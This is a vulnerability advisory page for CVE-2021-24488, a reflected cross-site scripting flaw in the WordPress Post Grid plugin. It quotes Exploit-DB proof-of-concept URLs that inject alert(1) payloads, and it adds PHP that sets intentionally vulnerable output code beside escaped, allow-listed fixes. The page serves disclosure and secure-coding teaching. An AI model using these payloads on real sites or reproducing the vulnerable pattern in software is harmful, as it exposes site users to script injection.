CVE-2021-24488
Published: 2021-08-02
Priority: P342 · Severity: medium · CVSS 3.1 base score: 6.1
Public exploit available
EPSS: 11.29% (95.4th percentile)
The slider import search feature and tab parameter of the Post Grid WordPress plugin before 2.1.8 settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pickplugins | post_grid | < 2.1.8 | 2.1.8 |
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| NVD | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
No detection rules found.
Exploit-DB

CVE-2021-24488 [MEDIUM] WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
exploitdb · 2022-02-02 · CVSS 6.1

---
# Exploit Title: WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
# Date: 3/16/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/post-grid/
# Version: 2.1.1
# Tested on: Windows 10
# CVE: CVE-2021-24488
1. Description:
This plugin creates a post grid from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
2. Proof of Concept:
wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab=">alert(1)
wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)//
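To show the defect class behind both PoC URLs (raw request input echoed into an attribute and into tag text) next to the fix a maintainer would apply, here is an added illustration in PHP. It is not the plugin's code; the markup, function names and allowed tab ids are assumptions, only the `tab` and `keyword` parameter names come from the advisory.

```php
<?php
// Added illustration, not the plugin's own code. Parameter names match the
// advisory; the markup, function names and tab ids are hypothetical.

// --- Vulnerable pattern: request input concatenated into HTML unescaped. ---
function render_tab_link_vulnerable() {
    $tab = isset($_GET['tab']) ? $_GET['tab'] : 'general';
    // A value containing "> closes the attribute and the tag, so the rest of
    // the value is parsed as markup (the shape of the first PoC above).
    echo '<a class="nav-tab" href="?page=post-grid-settings&tab=' . $tab . '">' . $tab . '</a>';
}

function render_search_box_vulnerable() {
    $keyword = isset($_GET['keyword']) ? $_GET['keyword'] : '';
    // A value containing a double quote terminates the attribute value, so
    // anything after it becomes a new attribute (the second PoC above).
    echo '<input type="text" name="keyword" value="' . $keyword . '">';
}

// --- Hardened pattern: validate the input, then escape for the exact output context. ---
function render_tab_link_safe() {
    $allowed = array('general', 'import', 'license');   // hypothetical tab ids
    $tab = isset($_GET['tab']) ? sanitize_key(wp_unslash($_GET['tab'])) : 'general';
    if (!in_array($tab, $allowed, true)) {
        $tab = 'general';   // unknown tab: fall back, never reflect the raw value
    }
    $href = add_query_arg(array('page' => 'post-grid-settings', 'tab' => $tab));
    // esc_url() for the href context, esc_html() for text between tags.
    echo '<a class="nav-tab" href="' . esc_url($href) . '">' . esc_html($tab) . '</a>';
}

function render_search_box_safe() {
    $keyword = isset($_GET['keyword']) ? sanitize_text_field(wp_unslash($_GET['keyword'])) : '';
    // esc_attr() encodes " < > & so the value cannot terminate the attribute.
    echo '<input type="text" name="keyword" value="' . esc_attr($keyword) . '">';
}
```

The allow-list on `tab` is the stronger control: a setting selector only ever needs a handful of known values, so there is no reason to reflect anything else, and escaping then covers the remaining free-text case on `keyword`.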
Nuclei

CVE-2021-24488 [MEDIUM] WordPress Post Grid <2.1.8 - Cross-Site Scripting
nuclei · CVSS 6.1
No writeups or analysis indexed.